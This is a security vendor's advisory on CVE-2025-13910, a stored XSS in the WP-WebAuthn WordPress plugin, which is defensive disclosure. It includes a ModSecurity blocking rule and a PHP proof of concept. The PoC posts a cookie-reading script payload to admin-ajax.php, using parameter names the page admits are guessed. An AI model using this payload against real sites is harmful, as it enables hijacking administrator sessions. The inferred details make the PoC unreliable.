What is CVE-2025-13910?

CVE-2025-13910 is a vulnerability in the WP-WebAuthn plugin for WordPress, specifically versions up to and including 1.3.4. It allows unauthenticated stored cross-site scripting (XSS) via the `wwa_auth` AJAX endpoint due to insufficient input sanitization and output escaping.

How does the vulnerability work?

The vulnerability allows attackers to inject arbitrary web scripts into the plugin’s log page. When an administrator views this log page, the injected scripts can execute in their browser session, potentially leading to session hijacking or other malicious actions.

Who is affected by this vulnerability?

Any WordPress site using the WP-WebAuthn plugin version 1.3.4 or earlier is at risk, particularly if the logging feature is enabled. This includes both site administrators and users who may access the log page.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if the WP-WebAuthn plugin is installed and identify its version. If it is version 1.3.4 or lower and logging is enabled, your site is susceptible to this vulnerability.

What is the severity level of this vulnerability?

CVE-2025-13910 has a CVSS score of 6.1, indicating a medium severity level. This means that while the vulnerability is not critical, it poses a significant risk that could be exploited by attackers with relatively low effort.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the WP-WebAuthn plugin to the latest version where the issue is resolved. Additionally, ensure that proper input validation and output escaping practices are implemented in any custom code that interacts with the plugin.

What are the potential risks of exploitation?

If exploited, attackers can execute arbitrary JavaScript in the context of an administrator’s browser. This could lead to session hijacking, unauthorized changes to site settings, or the creation of backdoors for further exploitation.

What does the proof of concept demonstrate?

The proof of concept shows how an attacker can send a crafted request to the vulnerable `wwa_auth` AJAX endpoint. It illustrates how a malicious payload can be logged and later executed when an administrator views the log page, demonstrating the ease of exploitation.

Is logging necessary for this vulnerability to be exploited?

Yes, for this vulnerability to be exploited, the logging feature of the WP-WebAuthn plugin must be enabled. If logging is disabled, the risk of exploitation is significantly reduced.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the logging feature of the WP-WebAuthn plugin to mitigate the risk of exploitation. Additionally, monitor your site for any suspicious activities.

Are there any additional security measures I should consider?

In addition to updating the plugin, consider implementing a web application firewall, regularly auditing your site for vulnerabilities, and educating administrators on safe practices to minimize the risk of XSS attacks.

How can I stay informed about future vulnerabilities?

Subscribe to security mailing lists, follow reputable security blogs, and regularly check the National Vulnerability Database (NVD) for updates on vulnerabilities related to WordPress plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 23, 2026

CVE-2025-13910: WP-WebAuthn <= 1.3.4 – Unauthenticated Stored Cross-Site Scripting (wp-webauthn)

CVE ID CVE-2025-13910

Plugin wp-webauthn

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.3.4

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13910 (metadata-based):
This vulnerability is an unauthenticated stored cross-site scripting (XSS) flaw in the WP-WebAuthn WordPress plugin versions up to and including 1.3.4. The vulnerability exists in the `wwa_auth` AJAX endpoint. Attackers can inject malicious scripts that execute when administrators view the plugin’s log page, provided logging is enabled in the plugin settings. The CVSS score of 6.1 reflects a medium severity attack with network accessibility and low user interaction requirements.

Atomic Edge research indicates the root cause is insufficient input sanitization and output escaping on user-supplied attributes logged by the plugin. The vulnerability description explicitly states this combination of failures. Without code access, we infer the plugin likely receives user input via the AJAX endpoint, stores it without proper sanitization in a log file or database, and later displays that log content without adequate escaping. The CWE-79 classification confirms improper neutralization of input during web page generation.

Exploitation requires sending a crafted request to the WordPress AJAX handler. Attackers target `/wp-admin/admin-ajax.php` with the `action` parameter set to `wwa_auth`. The malicious payload would be placed in another parameter processed by the endpoint. A typical XSS payload might be `alert(document.cookie)` or similar JavaScript. The plugin logs this input, and when an administrator views the log page, the script executes in their browser session. No authentication is required for the initial injection.

Remediation requires implementing proper input validation and output escaping. The plugin should sanitize all user input before storage using WordPress functions like `sanitize_text_field()` or `wp_kses()`. For output, the plugin must escape logged data before rendering it in HTML context using functions like `esc_html()` or `esc_attr()`. A defense-in-depth approach would also validate that logged data matches expected patterns for WebAuthn authentication attributes.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an administrator’s browser session. This can lead to session hijacking, site defacement, or privilege escalation. Attackers could create new administrative accounts, modify plugin settings, or inject backdoors. The stored nature means a single payload affects all administrators who view the log page. The requirement for logging to be enabled limits the attack surface but does not eliminate the risk.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2025-13910 (metadata-based)
# Blocks exploitation via the wwa_auth AJAX endpoint
# This rule matches the exact AJAX action and detects XSS payloads in common WebAuthn parameters
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:202513910,phase:2,deny,status:403,chain,msg:'CVE-2025-13910 via WP-WebAuthn AJAX endpoint',severity:'CRITICAL',tag:'CVE-2025-13910',tag:'WordPress',tag:'Plugin',tag:'WP-WebAuthn',tag:'XSS'"
  SecRule ARGS_POST:action "@streq wwa_auth" "chain"
    SecRule ARGS_POST|ARGS_GET "@rx <script[^>]*>|javascript:|onloads*=|onerrors*=|onmouseovers*=" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:removeWhitespace"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13910 - WP-WebAuthn <= 1.3.4 - Unauthenticated Stored Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2025-13910
 * Assumptions:
 * 1. Target runs WP-WebAuthn <= 1.3.4
 * 2. Plugin logging is enabled in settings
 * 3. The wwa_auth AJAX endpoint accepts unauthenticated requests
 * 4. The endpoint logs user-supplied parameters without sanitization
 */

$target_url = 'https://example.com';

// Construct the AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// XSS payload - will execute when admin views plugin log page
$payload = '<script>alert("Atomic Edge CVE-2025-13910 PoC: "+document.cookie)</script>';

// Prepare POST data
$post_data = array(
    'action' => 'wwa_auth',
    // Assuming the endpoint accepts a parameter that gets logged
    // Parameter name is inferred from typical WebAuthn authentication flow
    'user_agent' => $payload,
    // Include other likely parameters to make request appear legitimate
    'credential_id' => 'test',
    'client_data' => 'test',
    'authenticator_data' => 'test',
    'signature' => 'test'
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($http_code == 200) {
    echo "Payload sent successfully.n";
    echo "Check the WP-WebAuthn log page for XSS execution.n";
} else {
    echo "Request failed with HTTP code: " . $http_code . "n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-13910?
Understanding the vulnerability
CVE-2025-13910 is a vulnerability in the WP-WebAuthn plugin for WordPress, specifically versions up to and including 1.3.4. It allows unauthenticated stored cross-site scripting (XSS) via the `wwa_auth` AJAX endpoint due to insufficient input sanitization and output escaping.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to inject arbitrary web scripts into the plugin’s log page. When an administrator views this log page, the injected scripts can execute in their browser session, potentially leading to session hijacking or other malicious actions.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the WP-WebAuthn plugin version 1.3.4 or earlier is at risk, particularly if the logging feature is enabled. This includes both site administrators and users who may access the log page.
How can I check if my site is vulnerable?
Steps to assess risk
To check if your site is vulnerable, verify if the WP-WebAuthn plugin is installed and identify its version. If it is version 1.3.4 or lower and logging is enabled, your site is susceptible to this vulnerability.
What is the severity level of this vulnerability?
Understanding the CVSS score
CVE-2025-13910 has a CVSS score of 6.1, indicating a medium severity level. This means that while the vulnerability is not critical, it poses a significant risk that could be exploited by attackers with relatively low effort.
How can I fix or mitigate this issue?
Remediation steps
To mitigate this vulnerability, update the WP-WebAuthn plugin to the latest version where the issue is resolved. Additionally, ensure that proper input validation and output escaping practices are implemented in any custom code that interacts with the plugin.
What are the potential risks of exploitation?
Consequences of a successful attack
If exploited, attackers can execute arbitrary JavaScript in the context of an administrator’s browser. This could lead to session hijacking, unauthorized changes to site settings, or the creation of backdoors for further exploitation.
What does the proof of concept demonstrate?
Illustrating the vulnerability
The proof of concept shows how an attacker can send a crafted request to the vulnerable `wwa_auth` AJAX endpoint. It illustrates how a malicious payload can be logged and later executed when an administrator views the log page, demonstrating the ease of exploitation.
Is logging necessary for this vulnerability to be exploited?
Understanding the attack surface
Yes, for this vulnerability to be exploited, the logging feature of the WP-WebAuthn plugin must be enabled. If logging is disabled, the risk of exploitation is significantly reduced.
What should I do if I cannot update the plugin immediately?
Temporary measures to reduce risk
If immediate updates are not possible, consider disabling the logging feature of the WP-WebAuthn plugin to mitigate the risk of exploitation. Additionally, monitor your site for any suspicious activities.
Are there any additional security measures I should consider?
Enhancing overall security
In addition to updating the plugin, consider implementing a web application firewall, regularly auditing your site for vulnerabilities, and educating administrators on safe practices to minimize the risk of XSS attacks.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
Subscribe to security mailing lists, follow reputable security blogs, and regularly check the National Vulnerability Database (NVD) for updates on vulnerabilities related to WordPress plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations